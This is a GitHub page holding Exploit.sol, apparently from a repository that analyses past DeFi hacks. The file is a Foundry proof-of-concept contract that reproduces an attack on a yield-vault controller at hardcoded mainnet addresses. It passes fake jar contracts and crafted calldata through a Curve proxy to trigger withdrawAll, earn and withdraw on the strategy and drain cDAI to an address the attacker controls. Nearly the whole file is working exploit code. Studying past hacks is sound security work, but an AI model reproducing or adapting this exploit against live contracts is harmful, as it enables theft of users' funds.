forked from abdulsamijay/Defi-Hack-Analysis-POC
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Exploit.sol
94 lines (77 loc) · 2.78 KB
/
Exploit.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
pragma solidity ^0.6.0;
pragma experimental ABIEncoderV2;
import "forge-std/Test.sol";
import {FakeJar} from "./FakeJar.sol";
import {FakeUnderlying} from "./FakeUnderlying.sol";
import {IController, ICurveProxy, IStrategy} from "./interface/ILogic.sol";
import "./interface/IERC20.sol";
contract Exploit is Test {
IController constant strategyCompoundDaiV2 =
IController(0x6847259b2B3A4c17e7c43C54409810aF48bA5210);
ICurveProxy constant curveProxy =
ICurveProxy(0x6186E99D9CFb05E1Fdf1b442178806E81da21dD8);
IERC20 constant DAI = IERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);
IERC20 constant cDAI = IERC20(0x5d3a536E4D6DbD6114cc1Ead35777bAB948E3643);
IERC20 constant pDAI = IERC20(0x6949Bb624E8e8A90F87cD2058139fcd77D2F3F87);
address constant strategy = 0xCd892a97951d46615484359355e3Ed88131f829D;
IStrategy constant strategyContract = IStrategy(strategy);
function exploit() external {
uint256 _fromJarAmount = strategyContract.getSuppliedUnleveraged();
console.log("unleveraged DAI", _fromJarAmount);
address[] memory target = new address[](5);
bytes[] memory data = new bytes[](5);
for (uint8 i = 0; i < 5; i++) {
target[i] = address(curveProxy);
}
data[0] = abi.encodeWithSelector(
curveProxy.add_liquidity.selector,
strategy,
bytes4(keccak256(bytes("withdrawAll()"))),
1,
0,
address(cDAI)
);
data[1] = abi.encodeWithSelector(
curveProxy.add_liquidity.selector,
address(pDAI),
bytes4(keccak256(bytes("earn()"))),
1,
0,
address(cDAI)
);
data[2] = abi.encodeWithSelector(
curveProxy.add_liquidity.selector,
address(pDAI),
bytes4(keccak256(bytes("earn()"))),
1,
0,
address(cDAI)
);
data[3] = abi.encodeWithSelector(
curveProxy.add_liquidity.selector,
address(pDAI),
bytes4(keccak256(bytes("earn()"))),
1,
0,
address(cDAI)
);
data[4] = abi.encodeWithSelector(
curveProxy.add_liquidity.selector,
strategy,
bytes4(keccak256(bytes("withdraw(address)"))),
1,
0,
address(new FakeUnderlying(address(cDAI)))
);
console.log("DAI balance on pDAI", DAI.balanceOf(address(pDAI)));
strategyCompoundDaiV2.swapExactJarForJar(
address(new FakeJar(cDAI)),
address(new FakeJar(cDAI)),
0,
0,
target,
data
);
console.log("cDAI after swapExactJarForJar", cDAI.balanceOf(address(1337)));
}
}